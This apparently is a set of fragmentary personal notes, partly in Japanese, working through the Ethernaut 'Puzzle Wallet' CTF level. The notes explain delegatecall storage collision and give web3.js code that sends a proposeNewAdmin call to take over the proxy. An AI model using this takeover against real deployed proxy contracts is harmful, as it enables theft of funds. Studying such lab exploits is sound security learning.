✅ notice the slot layout when using the delegateCall function

To do so, they voted and assigned two people with special roles in the system:

DelegateCall

The vulnerability here arises due to storage collision between the proxy contract (PuzzleProxy) and logic contract (PuzzleWallet). And storage collision is a nightmare when using delegatecall.

別にdelegateの前に起きていたってことか

Although contract instance provided web3js API, doesn't expose the proposeNewAdmin  method, we can always encode the signature of a function call and send a transaction to the contract:

functionJson = {
	name: 'proposeNewAdmin',
	type: "function",
	inputs: [
				{
						type:"address",//arguments type
						name: "_newAdmin" //arguments name
				 }
		]
}

params = [player] // to change the owner to player

data = web3.eth.abi.encodeFunctionCall(functionJson, params);
await web3.eth.sendTransaction({from: player, to: instance, data})
web3.eth.abi.encodeFunctionCall({
    name: 'myMethod',
    type: 'function',
    inputs: [{
        type: 'uint256',
        name: 'myNumber'
    },{
        type: 'string',
        name: 'myString'
    }]
}, ['2345675643', 'Hello!%']); //arguments
web3.eth.abi.encodeFunctionCall(jsonInterface, parameters);
web3.eth.sendTransaction({
    from: "0xEB014f8c8B418Db6b45774c326A0E64C78914dC0",
    gasPrice: "20000000000",
    gas: "21000",
    to: '0x3535353535353535353535353535353535353535',
    value: "1000000000000000000",
    data: ""
}, 'MyPassword!').then(console.log);
> '0xda3be87732110de6c1354c83770aae630ede9ac308d9f7b399ecfba23d923384'

adminを変更したい!

maxBalanceが対応しているからそれを変更すればOK

but init is required some conditions

    function setMaxBalance(uint256 _maxBalance) external onlyWhitelisted {
      require(address(this).balance == 0, "Contract balance is not 0");
      maxBalance = _maxBalance;
    }

----------------------------------------------
await getBalance(contract.address)
// Output: 0.001

how to reduce the balance of address